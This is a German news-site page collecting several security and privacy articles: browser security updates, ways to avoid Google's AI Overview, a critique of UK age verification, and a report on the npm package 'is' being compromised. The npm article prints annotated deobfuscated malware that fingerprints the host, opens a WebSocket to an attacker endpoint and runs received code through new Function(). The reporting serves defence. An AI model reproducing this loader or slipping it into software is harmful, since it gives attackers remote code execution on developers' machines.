Connect with us

Datenschutz & Sicherheit

Chrome, Firefox & Thunderbird: Neue Versionen beheben Schwachstellen


Die neue Version 141 von Mozillas Browser Firefox ist da und hat Security-Fixes im Gepäck. Auch den ESR-Versionen (Extended Support Releases) hat Mozilla Sicherheitsverbesserungen in Gestalt der abgesicherten Versionen ESR 115.26, ESR 128.13 und ESR 140.1 spendiert. Gleiches gilt für den Mail-Client Thunderbird, der jetzt ebenfalls in Version 141 sowie in den gefixten ESR-Fassungen 128.13 und 140.1 vorliegt.

Die gefährlichsten unter den geschlossenen Sicherheitslücken wurden mit „High“ bewertet; Einstufungen als „kritisch“ sind nicht dabei. Ein Warnhinweis des Bundesamts für Sicherheit in der Informationstechnik (BSI) fasst die Bedrohungen kurz zusammen. Demnach könnten einige der Lücken unter bestimmten Voraussetzungen aus der Ferne ausgenutzt werden, um etwa im Kontext der Software Programmcode auszuführen, Denial-of-Service-Zustände hervorzurufen oder an sensible Daten zu gelangen.

Wer sich für nähere Schwachstellen-Details interessiert, findet diese in Mozillas Advisories zu den jeweiligen neuen Versionen.

Zu den neuen Features in Firefox 141 zählen unter anderem ein KI-Assistent für die Tab-Organisation, eine bessere Anpassbarkeit der vertikalen Tableiste sowie diverse Optimierungen für einen reduzierten RAM-Bedarf. Den Details haben wir eine eigene Meldung gewidmet:

Für Googles Chrome-Browser gab es am gestrigen Dienstag ein sogenanntes Stable Channel Update auf die Versionen 138.0.7204.168/.169 (Windows, macOS) beziehungsweise 138.0.7204.168 (Linux).

Mit Details zu den geschlossenen Sicherheitslücken geht Googles Update-Mitteilung gewohnt sparsam um: Man wolle den Nutzern ausreichend Zeit geben, die verfügbaren Updates anzuwenden, statt unnötige Angriffsrisiken zu verursachen.

Das Unternehmen gibt an, insgesamt drei Security-Fixes vorgenommen zu haben. Geschlossen wurden zwei Lücken mit „High“-Einstufung (CVE-2025-8010, CVE-2025-8011). „Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Google Chrome ausnutzen, um beliebigen Programmcode auszuführen“, erläutert eine diesbezügliche Veröffentlichung des BSI.

Um zu prüfen, ob Chrome bereits auf dem aktuellen Stand ist, können Nutzerinnen und Nutzer den Versionsdialog aufrufen. Den erreichen sie durch einen Klick auf das Symbol mit den drei aufgestapelten Punkten rechts von der Adressleiste und dort den weiteren Weg über „Hilfe“ hin zu „Über Google Chrome“. Das stößt gegebenenfalls auch den Update-Vorgang an, wenn der Browser veraltet ist.



(Bild: heise online / Screenshot)

Auf anderen Plattformen sind die App-Stores oder etwa unter Linux die Distributions-spezifische Softwareverwaltung für die Aktualisierung zuständig. Da der Chromium-Code die Basis für andere Webbrowser wie Microsofts Edge darstellt, dürften auch diese in Kürze aktualisierte Fassungen verteilen. Nutzer sollten diese dann zügig installieren.


(ovw)



Source link

Weiterlesen
Kommentar schreiben

Leave a Reply

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

Datenschutz & Sicherheit

Googles „Übersicht mit KI“ abstellen, so gehts


Seit März 2025 ist die sogenannte „Übersicht mit KI“ auch in Deutschland vollständig in der Google-Suche integriert. Google bietet direkt unter der Suchleiste eine per Sprachmodell generierte Zusammenfassung der Suchergebnisse an, „um schneller und einfacher“ zu Suchergebnissen zu kommen, so Google selbst.

Jedoch sind die Antworten der KI-Übersicht nicht verlässlich: Die Google-KI kann „unrichtige oder anstößige Informationen liefern. Bei Übersichten mit KI können und werden Fehler vorkommen“, wie der Konzern erklärt. Die „Übersicht mit KI“ sei eine Kernfunktion der Google-Suche und ließe sich deswegen nicht direkt deaktivieren.

Es gibt aber aktuelle Möglichkeiten, die KI-Übersicht dauerhaft zu meiden. Sie können je nach Browser variieren – und ob sie auf Dauer funktionieren, hängt von Google ab. Noch bietet Google selbst eine Ansicht der Suchergebnisse ohne KI, allerdings ein wenig versteckt: Bereits im Mai 2024 führte Google hierfür einen neuen Reiter mit dem Namen „Web“ ein, zusätzlich zu  den Reitern „Bilder“, „Videos“ und „News“. Manchmal befindet sich dieser Reiter hinter dem Aufklapp-Menü „Mehr“ am Ende der Auflistung.

Nach dem Googeln auf diesen Reiter zu klicken ist eine Möglichkeit, die KI-Übersicht zu meiden. Wer sich jedoch das dauerhafte Klicken sparen möchte, kann sich zumindest in manchen Browsern direkt diesen Web-Reiter anzeigen lassen. Das heißt, man bekommt nach einer Suchanfrage sofort die Ergebnisse ohne KI-Zusammenfassung serviert.

Benutzerdefinierte Suchmaschine anlegen

Bildschirmfoto von Firefox zeigt den im Text beschriebenen Weg
So kann es bei Firefox aussehen. – Alle Rechte vorbehalten Screenshot: Firefox

Um Googles KI-Zusammenfassung zu umgehen, lässt sich in den Browser-Einstellungen bei Firefox und Chrome eine benutzerdefinierte URL für Suchmaschinen festlegen.

Bei Chrome funktioniert die Umstellung in sieben Schritten:


2025-07-14
415.12
39


– für digitale Freiheitsrechte!



Euro für digitale Freiheitsrechte!

 

  • Mit einem Klick auf das Drei-Punkte-Symbol in der Browser-Leiste öffnen sich die Browser-Einstellungen.
  • In der Spalte links öffnet ein Klick auf den Menüpunkt „Suchmaschinen“ die Suchmaschinen-Einstellungen.
  • Dort auf „Suchmaschinen und die Websitesuche verwalten“ klicken.
  • Unter „Websitesuche“ lässt sich ein neuer Eintrag mit dem Button „Hinzufügen“ anlegen.
  • Es öffnet sich ein kleines Fenster mit mehreren Eingabemöglichkeiten: „Name“ und „Kürzel“ können frei gewählt werden. Wichtig ist nur unter „URL“ folgendes Eingabe: {google:baseURL}/search?udm=14&q=%s
  • Mit Klick auf den Button „Hinzufügen“ wird dieser neue Eintrag gespeichert.
  • In der Auflistung der Suchmaschinen, direkt hinter dem neuen Eintrag, muss im Drei-Punkte-Menü noch die Option „Als Standard festlegen“ angeklickt werden.

Diese Änderung lässt sich auch schnell wieder rückgängig machen, indem man Google wieder als Standardsuchmaschine festlegt.

Bei Firefox funktioniert die Umstellung ähnlich einfach:

  • Ein Klick aufs Burger-Symbol in der Browserleiste öffnet die Einstellungen.
  • In der Spalte links öffnet ein Klick auf den Menüpunkt „Suche“ die Suchmaschinen-Einstellungen.
  • Unten auf der Seite bei „Suchmaschinen-Schlüsselwörter“ legt ein Klick auf „Hinzufügen“ einen neuen Eintrag an.
  • Es öffnet sich ein kleines Fenster mit mehreren Eingabemöglichkeiten: „Name der Suchmaschine“ und „Schlüsselwort“ sind frei wählbar. Wichtig ist, unter „URL mit %s anstelle des Suchbegriffs“ Folgendes einzugeben:
  • Mit Klick auf „Suchmaschine hinzufügen“ wird dieser neue Eintrag gespeichert.
  • Oben auf der Seite unter „Standardsuchmaschine“ lässt sich im Drop-Down-Menü die neu angelegte Suchmaschine als Standard-Suchmaschine festlegen.

In diesem Drop-Down-Menü kann man die Standardsuchmaschine auf Wunsch auch wieder ändern.

Bei Safari ist es nicht möglich, benutzerdefinierte Suchmaschinen anzulegen, ohne weitere Apps oder Add-ons zu installieren.

„Übersicht mit KI“ verändert Browsing-Verhalten

Kürzlich veröffentlichte das US-Meinungsforschungsinstitut Pew Research Center eine Studie zum Online-Suchverhalten von 900 Teilnehmer*innen. Dabei fanden die Wissenschaftler*innen heraus, dass die „Übersicht mit KI“ deutliche Auswirkungen hat. Erscheint bei einer Suche mit Google eine KI-Zusammenfassung, ist demnach die Wahrscheinlichkeit geringer, dass Suchende noch auf Links zu weiterführenden Webseiten klicken. Außerdem würden Google-Nutzende öfter ihre Browsing-Session beenden, nachdem eine KI-Zusammenfassung auftaucht. Auch andere Studien bestätigen diesen Effekt. Viele sehen in dieser Entwicklung deshalb eine Bedrohung für werbefinanzierte Webseiten, da Aufrufzahlen und somit Einnahmen sinken.

Eine andere Möglichkeit, die „Übersicht mit KI“ zu umgehen, ist die Suchmaschine zu wechseln. In der alternativen Suchmaschine „DuckDuckGo“ gibt es zwar auch eine KI-Zusammenfassung; sie lässt sich jedoch direkt in den Einstellungen der Suchmaschine ausstellen. Außerdem legt der US-Anbieter größeren Wert auf Privatsphäre der Nutzenden. In den Datenschutzbestimmungen von DuckDuckGo heißt es: „Wir speichern und teilen Ihre Such- und Browserverläufe nicht“. Hier berichten wir ausführlicher über alternative Suchmaschinen.



Source link

Weiterlesen

Datenschutz & Sicherheit

Pornhub beugt sich britischen Alterskontrollen


Ab heute, dem 25. Juli, müssen Plattformen mit potenziell für Kinder schädlichen Inhalten das Alter britischer Nutzer*innen kontrollieren. Die Grundlage dafür ist der Online Safety Act, durchgesetzt von der dortigen Medienaufsicht Ofcom.

Pornhub-Mutterkonzern Aylo, eines der weltgrößten Porno-Unternehmen, zieht mit und betont in feinster PR-Prosa, sich schon seit Jahren für das Thema eingesetzt zu haben. Andernorts, in Deutschland und Frankreich etwa, wehrt sich Pornhub erbittert gegen ähnliche Vorstöße vor Gericht. Denn auch in der EU drängen Politik und Behörden auf rigorose Altersschranken.

Großbritannien geht hier mit schlechtem Beispiel voran. Der Blick zum ehemaligen EU-Land lohnt sich, um zu sehen, wie man es nicht machen sollte.

Zu den in Großbritannien amtlich empfohlenen Methoden der Alterskontrolle gehören etwa der Upload von Ausweisdokumenten oder biometrische Gesichtsscans. Auch über Banken oder mithilfe von Kreditkarten können Nutzer*innen ihr Alter nachweisen. Betroffen sind nicht nur Pornoseiten, sondern ebenso andere Plattformen mit potenziell nicht jugendfreien Inhalten, darunter Reddit, Discord, Bluesky oder Grindr.

Behörde warnt vor Hürden, die sie selbst errichtet hat

Die von der Ofcom empfohlenen Methoden zur Alterskontrolle, die auf Dokumenten basieren, schließen nicht nur Menschen ohne Papiere aus – sie sind auch eine Gefahr für Datenschutz und Privatsphäre. Nicht minder bedenklich sind biometrische Gesichtsscans, denn Biometrie ist ähnlich invasiv.

Mithilfe von biometrischen Gesichtersuchmaschinen wie Clearview AI oder PimEyes lassen sich Menschen allein anhand ihres Gesichts identifizieren. Hinzu kommt potenzielle Diskriminierung: KI-basierte Systeme, die das Alter anhand des Gesichts abschätzen, machen Fehler, insbesondere bei Personen aus Gruppen, die in den Trainingsdaten unterrepräsentiert sind.

Es mutet zynisch an, wenn die britische Medienaufsicht selbst auf einer Infoseite schreibt:

Sie sollten bei der Weitergabe persönlicher Informationen ein gewisses Maß an Vorsicht und Urteilsvermögen walten lassen.

Die Behörde warnt also vor den Hürden, die sie selbst errichtet hat. Aus gutem Grund pocht die EU-Kommission in ihren Leitlinien zu Alterskontrollen auf Datensparsamkeit und Anonymität. Wobei nach wie vor zweifelhaft ist, ob sich die EU auch an ihre eigenen Maßstäbe halten wird.

Kontrollen lassen sich kinderleicht umgehen

Bei aller Kritik am „Wie“ von Alterskontrollen kann die Frage nach dem „Ob“ schnell in Vergessenheit geraten. Denn Fachleute für Medienpädagogik und für digitale Grundrechte hinterfragen, dass solche strengen Altersschranken überhaupt eingesetzt werden – auch im Interesse der Jugendlichen selbst. Der Grund: Minderjährige brauchen gute Infoangebote statt Verbote; sie brauchen vertrauensvolle Ansprechpersonen statt Ausweiskontrollen. Die leicht umgehbaren Kontrollsysteme bieten nur eine trügerische Sicherheit.

Die offenkundige Ignoranz gegenüber solchen Einwänden legt den Verdacht nahe, dass bei der beharrlich betriebenen Alterskontroll-Politik andere Motive eine Rolle spielen. So könnte es bei manchen Wähler*innen einen Eindruck von Durchsetzungskraft und Stärke hinterlassen, wenn Politik und Behörden Tech-Konzerne zum Einlenken bringen. Zudem dürfte ein Internet mit mehr Kontrollen und Datenspuren, mit weniger Anonymität und Freiheiten all jenen gefallen, die seit Jahrzehnten Überwachungsfantasien hegen.

Überwachungsfantasie ist das Stichwort für die Gefahr hinter der britischen Symbolpolitik. Stand aktuell werden die hart erkämpften Alterskontrollen keinen einzigen britischen Jugendlichen von Pornos fernhalten. Mit simplen Mitteln wie VPN-Software oder dem Tor-Browser lassen sich die Kontrollen kinderleicht umgehen. Sie verfehlen ihren angeblichen Zweck.

Die BBC zitiert einen britischen Nutzer, der ironisch von einer „schweren“ Entscheidung spricht: „Na klar gebe ich meine sensiblen Daten einfach irgendeinem unbekannten, nicht überprüften Unternehmen – oder… ich benutze eben ein VPN.“ Der Nutzer steht damit stellvertretend für viele andere. Auch in US-Bundesstaaten ging die VPN-Nutzung durch die Decke, nachdem deren Regierungen Pornoseiten zur Einführung von Alterskontrollen gedrängt hatten.

Medienaufsicht will Infos über VPNs einschränken

Wenig sinnvolle Alterskontrollen, die sich auch noch leicht umgehen lassen: Die Geschichte der britischen Alterskontrollen könnte eine Komödie sein, wenn sie an dieser Stelle enden würde. Das tut sie aber nicht.


2025-07-14
415.12
39


– für digitale Freiheitsrechte!



Euro für digitale Freiheitsrechte!

 

Die Einführung der Alterskontrollen könnten sich nämlich nur als der erste Akt einer Tragödie erweisen, um Stück für Stück Anonymisierungs-Dienste wie VPN-Software oder Tor zu kriminalisieren. Solche Dienste gehören in den Werkzeugkasten digitaler Selbstverteidigung, um Grundrechte wie Datenschutz, Privatsphäre oder Informationsfreiheit zu wahren und Zensur zu umgehen. Wer ein VPN nutzt, verschleiert gegenüber dem eigenen Internet-Zugangsanbieter und dem Website-Betreiber die tatsächliche Herkunft; vertraut diese Informationen jedoch dem VPN-Anbieter an.

Der britischen Medienaufsicht sind VPN-Dienste jetzt schon ein Dorn im Auge, wie aus einer Leitlinie für Betreiber von Pornoseiten hervorgeht. Demnach sollen die betroffenen Seiten keine Inhalte zulassen, die Minderjährige dazu anleiten oder ermutigen, Zugangskontrollen zu umgehen. Verboten sind demnach „Informationen über oder Links zu einem Virtual Private Network (VPN)“.

Weg in eine düstere Zukunft

Solche Formulierungen erinnern auf beklemmende Weise an Gesetze aus autoritären Staaten, die den Zugang zur Informationen und damit die Meinungsfreiheit kontrollieren wollen. Zum Beispiel hat der Iran die Nutzung von VPN-Diensten verboten. Der russische Staat sperrt VPN-Dienste, die nicht mit Behörden kooperieren wollen.

Von den Ofcom-Leitlinien zu einem veritablen VPN-Verbot mag es noch ein langer Weg sein. Zunächst sollen es Pornoseiten ihren britischen Nutzer*innen lediglich nicht unter die Nase reiben, wie man ihre Kontrollen umgeht. Ohne Blick aufs große Ganze könnte man das als schlüssig betrachten. Allerdings ebnet es den Weg für radikalere Vorstöße.

Grassierende Alterskontrollen können also in eine düstere Zukunft führen, in der eines Tages auch in Großbritannien und der EU ernsthaft über die Kriminalisierung von VPN-Diensten diskutiert wird – natürlich nur im Namen des Jugendschutzes. Politiker*innen, die nach einem lückenlos überwachten Internet trachten, könnten mit gespielter Überraschung anprangern, dass die Alterskontrollen ja gar nicht wirksam sind und man da doch etwas unternehmen müsse. Sonst wären die jahrelangen Bemühungen umsonst gewesen; das dürfe man den Kindern nicht antun.

Und plötzlich stehen dann die Grundrechte von allen auf dem Spiel, die sich aus gutem Grund vor kommerzieller und staatlicher Überwachung im Netz schützen müssen, darunter Journalist*innen und Aktivist*innen, Dissident*innen und Oppositionelle, verfolgte Minderheiten, Whistleblower*innen und so weiter.

Währenddessen hilft niemand jungen Menschen, die einfach nur mehr darüber wissen wollen, wie Lust, Sex und Einvernehmlichkeit funktionieren. Dafür bräuchte es nicht etwa Beschäftigung mit Seiten wie Pornhub, sondern unverklemmte, der Entwicklung angemessene Angebote für sexuelle Aufklärung.



Source link

Weiterlesen

Datenschutz & Sicherheit

Beliebtes JavaScript-Paket is: Malware durch Supply-Chain-Angriff


Ein Software-Supply-Chain-Angriff hat das beliebte JavaScript-Paket is getroffen, das es auf knapp 2,7 Millionen Downloads pro Woche bringt.

Der Maintainer Jordan Harband schreibt auf Bluesky, dass Angreifer den Account eines anderen Projektverantwortlichen übernommen hatten. Betroffen sind die Versionen 3.3.1 und 5.0.0 des Pakets.

Empfohlener redaktioneller Inhalt

Mit Ihrer Zustimmung wird hier ein externer Inhalt geladen.

Heads up that v3.3.1 of npmjs.com/is has malware in it, due to another maintainer’s account being hijacked. They’re removed for now, v3.3.0 is set at latest, v3.3.1 is deprecated, and a v3.3.2 will be published once I’m not on my phone (thx @github.com codespaces)

[image or embed]

— Jordan Harband (@jordan.har.band) Jul 19, 2025 at 20:21

Beide Versionen waren offenbar nur wenige Stunden im Umlauf. Inzwischen ist auf der npm-Seite die Version 3.3.2 verfügbar, die keinen Schadcode erhält. Als Übergang hatte Harband die neueren Releases für deprecated erklärt und 3.3.0 als letzte aktive Version markiert, damit Prozesse, die automatisch die jüngste Version eines JavaScript-Pakets von npm anfordern, nicht weiter den Schadcode herunterladen.

Bei is handelt es sich um eine Testing-Library, die unter anderem überprüft, ob ein Wert definiert (is.defined), leer (is.empty) oder von einem bestimmten Typ (generell über is.type(value, type) oder speziell als is.integer, is.bool, is.array etc.) ist.


enterJS Web Security Day

enterJS Web Security Day

(Bild: Alexander Supertramp/Shutterstock.com)

Neun von zehn Webanwendungen haben Sicherheitslücken – höchste Zeit für Web Developer, zu handeln. Auf dem ersten enterJS Web Security Day am 9. Oktober 2025 geht es um automatisierte Sicherheitsprüfungen, den Einsatz von Passkeys und den Schutz vor KI-basierten Angriffen.

Offenbar war dieselbe Angreifergruppe erfolgreich, die mit einer Phishing-Attacke zuvor zahlreiche npm-Maintainer getroffen und bereits die Pakete eslint‑config‑prettier, eslint‑plugin‑prettier, synckit@0.11.9, @pkgr/core, napi‑postinstall und got-fetch mit Schadcode versehen hatte.

Der Angriff auf die anderen Pakete zielte mit einer DLL nur auf Windows. Ein Blogartikel auf Invoke RE beschreibt die in dem Paket eslint‑config‑prettier gefundene Scavenger-Malware genauer.

Der Malware-Loader im is-Paket schlägt dagegen plattformübergreifend unter Windows, macOS und Linux zu.

Ein Blogbeitrag des Security-Softwareunternehmens Socket beschreibt die Arbeitsweise des verschleierten JavaScript-Codes. Der Loader erstellt die Payload demnach vollständig im Speicher des betroffenen Systems und legt den dekodierten Schadcode mittels new Function() als eigene Funktion an.

Diese Funktion fragt schließlich zahlreiche Details wie den Hostnamen, das Betriebssystem, Details zur CPU und Umgebungsvariablen von process.env ab. Schließlich nutzt sie die Library ws, um eine WebSocket-Verbindung aufzubauen und die Daten zu übertragen.

Das Security-Team von Socket hat den entschleierten Schadcode mit Kommentaren versehen, die die Funktionen beschreiben:


// Expose Node's `require`, even in restricted contexts (e.g., Electron)
get "switch"() { return require; }

// Load system and networking modules dynamically
const os = this["switch"]("os");
const WS = this["switch"]("ws");

// Connect to threat actor-controlled WebSocket endpoint
const sock = new WS("wss://");

// Send host fingerprinting data on connect
sock.onopen = () => sock.send(JSON.stringify({
  host: os.hostname(),
  plat: os.platform(),
  cwd : process.cwd()
}));

// Execute threat actor-supplied code received over the socket
sock.onmessage = ({ data }) => {
  new Function(data)();  // remote code execution
};


Im letzten Abschnitt ist erkennbar, dass der Schadcode mit der WebSocket-Verbindung eine Remote Shell aufbaut: Er führt den empfangenen JavaScript-Code direkt über new Function() aus. Der aufgerufene Code hat dieselben Rechte wie der Host-Prozess, sodass er üblicherweise direkten Zugriff aufs Dateisystem und den Netzwerkverkehr hat.

Wer die Library einbindet, sollte sicherstellen, dass keine der infizierten Varianten auf den Rechner gelangt sind. Es ist zudem davon auszugehen, dass die Angreifergruppe weitere JavaScript-Maintainer im Fokus hatte oder hat.


(rme)



Source link

Weiterlesen

Beliebt